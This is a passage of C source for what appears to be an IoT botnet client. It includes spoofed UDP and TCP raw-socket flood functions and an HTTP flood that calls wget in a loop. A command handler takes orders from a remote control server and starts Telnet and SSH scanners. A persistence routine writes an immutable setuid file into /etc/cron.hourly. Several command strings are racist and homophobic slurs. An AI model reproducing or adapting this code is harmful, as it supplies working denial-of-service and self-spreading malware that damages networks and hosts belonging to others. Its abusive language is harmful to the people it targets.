				if(port == 0) dest_addr.sin_port = rand_cmwc();
1523
				if(time(NULL) > end) break;
1524
				i = 0;
1525
				continue;
1526
			}
1527
			i++;
1528
		}
1529
	} else {
1530
		int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
1531
		if(!sockfd)
1532
		{
1533
			sockprintf(mainCommSock, "Failed opening raw socket.");
1534
			return;
1535
		}
1536

1537
		int tmp = 1;
1538
		if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)
1539
		{
1540
			sockprintf(mainCommSock, "Failed setting raw headers mode.");
1541
			return;
1542
		}
1543

1544
		int counter = 50;
1545
		while(counter--)
1546
		{
1547
			srand(time(NULL) ^ rand_cmwc());
1548
			init_rand(rand());
1549
		}
1550

1551
		in_addr_t netmask;
1552

1553
		if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
1554
		else netmask = ( ~((1 << (32 - spoofit)) - 1) );
1555

1556
		unsigned char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + packetsize];
1557
		struct iphdr *iph = (struct iphdr *)packet;
1558
		struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
1559

1560
		makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_UDP, sizeof(struct udphdr) + packetsize);
1561

1562
		udph->len = htons(sizeof(struct udphdr) + packetsize);
1563
		udph->source = rand_cmwc();
1564
		udph->dest = (port == 0 ? rand_cmwc() : htons(port));
1565
		udph->check = 0;
1566

1567
		makeRandomStr((unsigned char*)(((unsigned char *)udph) + sizeof(struct udphdr)), packetsize);
1568

1569
		iph->check = csum ((unsigned short *) packet, iph->tot_len);
1570

1571
		int end = time(NULL) + timeEnd;
1572
		register unsigned int i = 0;
1573
		while(1)
1574
		{
1575
			sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
1576

1577
			udph->source = rand_cmwc();
1578
			udph->dest = (port == 0 ? rand_cmwc() : htons(port));
1579
			iph->id = rand_cmwc();
1580
			iph->saddr = htonl( getRandomIP(netmask) );
1581
			iph->check = csum ((unsigned short *) packet, iph->tot_len);
1582

1583
			if(i == pollRegister)
1584
			{
1585
				if(time(NULL) > end) break;
1586
				i = 0;
1587
				continue;
1588
			}
1589
			i++;
1590
		}
1591
	}
1592
}
1593

1594
//     ________________     ________    ____  ____  ____
1595
//    /_  __/ ____/ __ \   / ____/ /   / __ \/ __ \/ __ \
1596
//     / / / /   / /_/ /  / /_  / /   / / / / / / / / / /
1597
//    / / / /___/ ____/  / __/ / /___/ /_/ / /_/ / /_/ /
1598
//   /_/  \____/_/      /_/   /_____/\____/\____/_____/
1599

1600
void sendTCP(unsigned char *target, int port, int timeEnd, int spoofit, unsigned char *flags, int packetsize, int pollinterval)
1601
{
1602
	register unsigned int pollRegister;
1603
	pollRegister = pollinterval;
1604

1605
	struct sockaddr_in dest_addr;
1606

1607
	dest_addr.sin_family = AF_INET;
1608
	if(port == 0) dest_addr.sin_port = rand_cmwc();
1609
	else dest_addr.sin_port = htons(port);
1610
	if(getHost(target, &dest_addr.sin_addr)) return;
1611
	memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1612

1613
	int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
1614
	if(!sockfd)
1615
	{
1616
		sockprintf(mainCommSock, "Failed opening raw socket.");
1617
		return;
1618
	}
1619

1620
	int tmp = 1;
1621
	if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)
1622
	{
1623
		sockprintf(mainCommSock, "Failed setting raw headers mode.");
1624
		return;
1625
	}
1626

1627
	in_addr_t netmask;
1628

1629
	if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
1630
	else netmask = ( ~((1 << (32 - spoofit)) - 1) );
1631

1632
	unsigned char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + packetsize];
1633
	struct iphdr *iph = (struct iphdr *)packet;
1634
	struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
1635

1636
	makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_TCP, sizeof(struct tcphdr) + packetsize);
1637

1638
	tcph->source = rand_cmwc();
1639
	tcph->seq = rand_cmwc();
1640
	tcph->ack_seq = 0;
1641
	tcph->doff = 5;
1642

1643
	if(!strcmp(flags, "all"))
1644
	{
1645
		tcph->syn = 1;
1646
		tcph->rst = 1;
1647
		tcph->fin = 1;
1648
		tcph->ack = 1;
1649
		tcph->psh = 1;
1650
	} else {
1651
		unsigned char *pch = strtok(flags, ",");
1652
		while(pch)
1653
		{
1654
			if(!strcmp(pch,         "syn"))
1655
			{
1656
				tcph->syn = 1;
1657
			} else if(!strcmp(pch,  "rst"))
1658
			{
1659
				tcph->rst = 1;
1660
			} else if(!strcmp(pch,  "fin"))
1661
			{
1662
				tcph->fin = 1;
1663
			} else if(!strcmp(pch,  "ack"))
1664
			{
1665
				tcph->ack = 1;
1666
			} else if(!strcmp(pch,  "psh"))
1667
			{
1668
				tcph->psh = 1;
1669
			} else {
1670
				sockprintf(mainCommSock, "Invalid flag \"%s\"", pch);
1671
			}
1672
			pch = strtok(NULL, ",");
1673
		}
1674
	}
1675

1676
	tcph->window = rand_cmwc();
1677
	tcph->check = 0;
1678
	tcph->urg_ptr = 0;
1679
	tcph->dest = (port == 0 ? rand_cmwc() : htons(port));
1680
	tcph->check = tcpcsum(iph, tcph);
1681

1682
	iph->check = csum ((unsigned short *) packet, iph->tot_len);
1683

1684
	int end = time(NULL) + timeEnd;
1685
	register unsigned int i = 0;
1686
	while(1)
1687
	{
1688
		sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
1689

1690
		iph->saddr = htonl( getRandomIP(netmask) );
1691
		iph->id = rand_cmwc();
1692
		tcph->seq = rand_cmwc();
1693
		tcph->source = rand_cmwc();
1694
		tcph->check = 0;
1695
		tcph->check = tcpcsum(iph, tcph);
1696
		iph->check = csum ((unsigned short *) packet, iph->tot_len);
1697

1698
		if(i == pollRegister)
1699
		{
1700
			if(time(NULL) > end) break;
1701
			i = 0;
1702
			continue;
1703
		}
1704
		i++;
1705
	}
1706
}
1707

1708
//       __  __________________     ________    ____  ____  ____
1709
//      / / / /_  __/_  __/ __ \   / ____/ /   / __ \/ __ \/ __ \
1710
//     / /_/ / / /   / / / /_/ /  / /_  / /   / / / / / / / / / /
1711
//    / __  / / /   / / / ____/  / __/ / /___/ /_/ / /_/ / /_/ /
1712
//   /_/ /_/ /_/   /_/ /_/      /_/   /_____/\____/\____/_____/
1713

1714
void sendHTTP(unsigned char *url, int end_time) // l7 fl00d
1715
{
1716
 int end = time(NULL) + end_time;
1717
 FILE *pf;
1718
    char command[80];
1719
    sprintf(command, "wget -O /tmp/fff");
1720
	strcat(command, url);
1721
	strcat(command, " > /dev/null ");
1722
    pf = popen(command,"r");
1723
	while(end > time(NULL))
1724
	{
1725
	system(command);
1726
	}
1727
}
1728

1729
//      ________  _______     ____  ____  ____  ______________________
1730
//     / ____/  |/  / __ \   / __ \/ __ \/ __ \/ ____/ ____/ ___/ ___/
1731
//    / /   / /|_/ / / / /  / /_/ / /_/ / / / / /   / __/  \__ \\__ \
1732
//   / /___/ /  / / /_/ /  / ____/ _, _/ /_/ / /___/ /___ ___/ /__/ /
1733
//   \____/_/  /_/_____/  /_/   /_/ |_|\____/\____/_____//____/____/
1734

1735
void processCmd(int argc, unsigned char *argv[])
1736
{
1737
	if(!strcmp(argv[0], "FUCKINGFAGGOT"))
1738
	{
1739
		sockprintf(mainCommSock, "PONG!");
1740
		return;
1741
	}
1742

1743
	if(!strcmp(argv[0], "GETLOCALIP"))
1744
	{
1745
		sockprintf(mainCommSock, "My IP: %s", inet_ntoa(ourIP));
1746
		return;
1747
	}
1748

1749
	if(!strcmp(argv[0], "SCANNER"))
1750
	{
1751
		if(argc != 2)
1752
		{
1753
			sockprintf(mainCommSock, "SCANNER SSH/TEL ON | SSH/TEL OFF");
1754
			return;
1755
		}
1756

1757
		if(!strcmp(argv[1], "OFF"))
1758
		{
1759
			if(scanPid == 0) return;
1760
			sockprintf(mainCommSock, "tel d0rk\n");
1761
			kill(scanPid, 9);
1762
			scanPid = 0;
1763
		
1764

1765
		if(!strcmp(argv[1], "TEL ON"))
1766
		{
1767
			if(scanPid != 0) return;
1768
			uint32_t parent;
1769
			parent = fork();
1770
			sockprintf(mainCommSock, "tel f0rk\n");
1771
			if (parent > 0) { scanPid = parent; return;}
1772
			else if(parent == -1) return;
1773

1774
			TelnetScan(1);
1775
			_exit(0);
1776
		}
1777
		
1778
		if(!strcmp(argv[1], "SSH ON"))
1779
		{
1780
			if(scanPid != 0) return;
1781
			uint32_t parent;
1782
			parent = fork();
1783
			sockprintf(mainCommSock, "tel f0rk\n");
1784
			if (parent > 0) { scanPid = parent; return;}
1785
			else if(parent == -1) return;
1786

1787
			secureShellScan(1);
1788
			_exit(0);
1789
		}
1790

1791
	}
1792
	
1793
	if(!strcmp(argv[0], "HTTP"))
1794
	{
1795
	if(argc < 3 || atoi(argv[2]) < 1)
1796
	{
1797
	return;
1798
	}
1799

1800
	unsigned char *ip = argv[1];
1801
	int time = atoi(argv[2]);
1802

1803
	if(strstr(ip, ",") != NULL)
1804
	{
1805
	unsigned char *hi = strtok(ip, ",");
1806
	while(hi != NULL)
1807
	{
1808
    if(!listFork())
1809
    {
1810
     sendHTTP(ip, time);
1811
     close(mainCommSock);
1812
     _exit(0);
1813
    }
1814
    hi = strtok(NULL, ",");
1815
	}
1816
	} else {
1817
	if (listFork()) { return; }
1818

1819
	sendHTTP(ip, time);
1820
	close(mainCommSock);
1821

1822
	_exit(0);
1823
	}
1824
	}
1825

1826
	if(!strcmp(argv[0], "UDP"))
1827
	{
1828
		if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[5]) == -1 || atoi(argv[5]) > 65500 || atoi(argv[4]) > 32 || (argc == 7 && atoi(argv[6]) < 1))
1829
		{
1830
			//sockprintf(mainCommSock, "UDP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <packet size (1 to 65500)> (time poll interval, default 10)");
1831
			return;
1832
		}
1833

1834
		unsigned char *ip = argv[1];
1835
		int port = atoi(argv[2]);
1836
		int time = atoi(argv[3]);
1837
		int spoofed = atoi(argv[4]);
1838
		int packetsize = atoi(argv[5]);
1839
		int pollinterval = (argc == 7 ? atoi(argv[6]) : 10);
1840

1841
		if(strstr(ip, ",") != NULL)
1842
		{
1843
			unsigned char *hi = strtok(ip, ",");
1844
			while(hi != NULL)
1845
			{
1846
				if(!listFork())
1847
				{
1848
					sendUDP(hi, port, time, spoofed, packetsize, pollinterval);
1849
					close(mainCommSock);
1850
					_exit(0);
1851
				}
1852
				hi = strtok(NULL, ",");
1853
			}
1854
		} else {
1855
			if (listFork()) { return; }
1856

1857
			sendUDP(ip, port, time, spoofed, packetsize, pollinterval);
1858
			close(mainCommSock);
1859

1860
			_exit(0);
1861
		}
1862
	}
1863

1864
	if(!strcmp(argv[0], "TCP"))
1865
	{
1866
		if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[4]) > 32 || (argc > 6 && atoi(argv[6]) < 0) || (argc == 8 && atoi(argv[7]) < 1))
1867
		{
1868
			//sockprintf(mainCommSock, "TCP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <flags (syn, ack, psh, rst, fin, all) comma seperated> (packet size, usually 0) (time poll interval, default 10)");
1869
			return;
1870
		}
1871

1872
		unsigned char *ip = argv[1];
1873
		int port = atoi(argv[2]);
1874
		int time = atoi(argv[3]);
1875
		int spoofed = atoi(argv[4]);
1876
		unsigned char *flags = argv[5];
1877

1878
		int pollinterval = argc == 8 ? atoi(argv[7]) : 10;
1879
		int psize = argc > 6 ? atoi(argv[6]) : 0;
1880

1881
		if(strstr(ip, ",") != NULL)
1882
		{
1883
			unsigned char *hi = strtok(ip, ",");
1884
			while(hi != NULL)
1885
			{
1886
				if(!listFork())
1887
				{
1888
					sendTCP(hi, port, time, spoofed, flags, psize, pollinterval);
1889
					close(mainCommSock);
1890
					_exit(0);
1891
				}
1892
				hi = strtok(NULL, ",");
1893
			}
1894
		} else {
1895
			if (listFork()) { return; }
1896

1897
			sendTCP(ip, port, time, spoofed, flags, psize, pollinterval);
1898
			close(mainCommSock);
1899

1900
			_exit(0);
1901
		}
1902
	}
1903

1904
	if(!strcmp(argv[0], "STOP"))
1905
	{
1906
		int killed = 0;
1907
		unsigned long i;
1908
		for (i = 0; i < numpids; i++) {
1909
			if (pids[i] != 0 && pids[i] != getpid()) {
1910
				kill(pids[i], 9);
1911
				killed++;
1912
			}
1913
		}
1914

1915
		if(killed > 0)
1916
		{
1917
			sockprintf(mainCommSock, "Killed %d.", killed);
1918
		} else {
1919
			sockprintf(mainCommSock, "None Killed.");
1920
		}
1921
	}
1922

1923
	if(!strcmp(argv[0], "LUCKYLILDUDE"))
1924
	{
1925
		exit(0);
1926
	}
1927
}
1928

1929
int initConnection()
1930
{
1931
	unsigned char server[512];
1932
	memset(server, 0, 512);
1933
	if(mainCommSock) { close(mainCommSock); mainCommSock = 0; } //if da sock initialized then close dat
1934
	if(currentServer + 1 == SERVER_LIST_SIZE) currentServer = 0;
1935
	else currentServer++;
1936

1937
	strcpy(server, commServer[currentServer]);
1938
	int port = 46;
1939
	if(strchr(server, ':') != NULL)
1940
	{
1941
		port = atoi(strchr(server, ':') + 1);
1942
		*((unsigned char *)(strchr(server, ':'))) = 0x0;
1943
	}
1944

1945
	mainCommSock = socket(AF_INET, SOCK_STREAM, 0);
1946

1947
	if(!connectTimeout(mainCommSock, server, port, 30)) return 1;
1948

1949
	return 0;
1950
}
1951

1952
int getOurIP()
1953
{
1954
	int sock = socket(AF_INET, SOCK_DGRAM, 0);
1955
	if(sock == -1) return 0;
1956

1957
	struct sockaddr_in serv;
1958
	memset(&serv, 0, sizeof(serv));
1959
	serv.sin_family = AF_INET;
1960
	serv.sin_addr.s_addr = inet_addr("8.8.8.8");
1961
	serv.sin_port = htons(53);
1962

1963
	int err = connect(sock, (const struct sockaddr*) &serv, sizeof(serv));
1964
	if(err == -1) return 0;
1965

1966
	struct sockaddr_in name;
1967
	socklen_t namelen = sizeof(name);
1968
	err = getsockname(sock, (struct sockaddr*) &name, &namelen);
1969
	if(err == -1) return 0;
1970

1971
	ourIP.s_addr = name.sin_addr.s_addr;
1972

1973
	int cmdline = open("/proc/net/route", O_RDONLY);
1974
	char linebuf[4096];
1975
	while(fdgets(linebuf, 4096, cmdline) != NULL)
1976
	{
1977
		if(strstr(linebuf, "\t00000000\t") != NULL)
1978
		{
1979
			unsigned char *pos = linebuf;
1980
			while(*pos != '\t') pos++;
1981
			*pos = 0;
1982
			break;
1983
		}
1984
		memset(linebuf, 0, 4096);
1985
	}
1986
	close(cmdline);
1987

1988
	if(*linebuf)
1989
	{
1990
		int i;
1991
		struct ifreq ifr;
1992
		strcpy(ifr.ifr_name, linebuf);
1993
		ioctl(sock, SIOCGIFHWADDR, &ifr);
1994
		for (i=0; i<6; i++) macAddress[i] = ((unsigned char*)ifr.ifr_hwaddr.sa_data)[i];
1995
	}
1996

1997
	close(sock);
1998
}
1999

2000
int main(int argc, unsigned char *argv[])
2001
{
2002
	
2003
	ismokeweed="/etc/cron.hourly/sockaddr";
2004
	FILE aids;
2005
	int immut = FS_IMMUTABLE_FL;
2006
	char r00t3d[11] = "shell exec";
2007
	aids = fopen(ismokeweed, "w+");
2008
	fwrite(r00t3d, sizeof(r00t3d[0]), sizeof(r00t3d) / sizeof(r00t3d[0]), aids);
2009
	fchmod(fileno(aids), 05777);
2010
	ioctl(fileno(aids), FS_IOC_SETFLAGS, &immut);
2011
	fclose(aids);
2012
	
2013
	if(SERVER_LIST_SIZE <= 0) return 0;
2014

2015
	srand(time(NULL) ^ getpid());
2016
	init_rand(time(NULL) ^ getpid());
2017

2018
	pid_t pid1;
2019
	pid_t pid2;
2020
	int status;
2021

2022
	getOurIP();
2023

2024
	if (pid1 = fork()) {
2025
			waitpid(pid1, &status, 0);
2026
			exit(0);
2027
	} else if (!pid1) {
2028
			if (pid2 = fork()) {
2029
					exit(0);
2030
			} else if (!pid2) {
2031
			} else {
2032
					zprintf("fork failed\n");
2033
			}
2034
	} else {
2035
			zprintf("fork failed\n");
2036
	}
2037

2038
	setsid();
2039
	chdir("/");
2040

2041
	signal(SIGPIPE, SIG_IGN);
2042

2043
	while(1)
2044
	{
2045
		if(initConnection()) { sleep(5); continue; }
2046

2047
		char commBuf[4096];
2048
		int got = 0;
2049
		int i = 0;
2050
		while((got = recvLine(mainCommSock, commBuf, 4096)) != -1)
2051
		{
2052
			for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0) {
2053
				unsigned int *newpids, on;
2054
				for (on = i + 1; on < numpids; on++) pids[on-1] = pids[on];
2055
				pids[on - 1] = 0;
2056
				numpids--;
2057
				newpids = (unsigned int*)malloc((numpids + 1) * sizeof(unsigned int));
2058
				for (on = 0; on < numpids; on++) newpids[on] = pids[on];
2059
				free(pids);
2060
				pids = newpids;
2061
			}
2062

2063
			commBuf[got] = 0x00;
2064

2065
			trim(commBuf);
2066

2067
			if(strstr(commBuf, "FUCKINGFAGGOT") == commBuf)
2068
			{
2069
				sockprintf(mainCommSock, "FUCKYOU");
2070
				continue;
2071
			}
2072

2073
			if(strstr(commBuf, "GUCCILILNIGGA") == commBuf) exit(0);
2074

2075
			unsigned char *message = commBuf;
2076

2077
			if(*message == '!')
2078
			{
2079
				unsigned char *nickMask = message + 1;
2080
				while(*nickMask != ' ' && *nickMask != 0x00) nickMask++;
2081
				if(*nickMask == 0x00) continue;
2082
				*(nickMask) = 0x00;
2083
				nickMask = message + 1;
2084

2085
				message = message + strlen(nickMask) + 2;
2086
				while(message[strlen(message) - 1] == '\n' || message[strlen(message) - 1] == '\r') message[strlen(message) - 1] = 0x00;
2087

2088
				unsigned char *command = message;
2089
				while(*message != ' ' && *message != 0x00) message++;
2090
				*message = 0x00;
2091
				message++;
2092

2093
				unsigned char *tmpcommand = command;
2094
				while(*tmpcommand) { *tmpcommand = toupper(*tmpcommand); tmpcommand++; }
2095

2096
				unsigned char *params[10];
2097
				int paramsCount = 1;
2098
				unsigned char *pch = strtok(message, " ");
2099
				params[0] = command;
2100

2101
				while(pch)
2102
				{
2103
					if(*pch != '\n')
2104
					{
2105
						params[paramsCount] = (unsigned char *)malloc(strlen(pch) + 1);
2106
						memset(params[paramsCount], 0, strlen(pch) + 1);
2107
						strcpy(params[paramsCount], pch);
2108
						paramsCount++;
2109
					}
2110
					pch = strtok(NULL, " ");
2111
				}
2112

2113
				processCmd(paramsCount, params);
2114

2115
				if(paramsCount > 1)
2116
				{
2117
					int q = 1;
2118
					for(q = 1; q < paramsCount; q++)
2119
					{
2120
						free(params[q]);
2121
					}
2122
				}
2123
			}
2124
		}
2125
	}
2126

2127
	return 0;
2128

2129
}
2130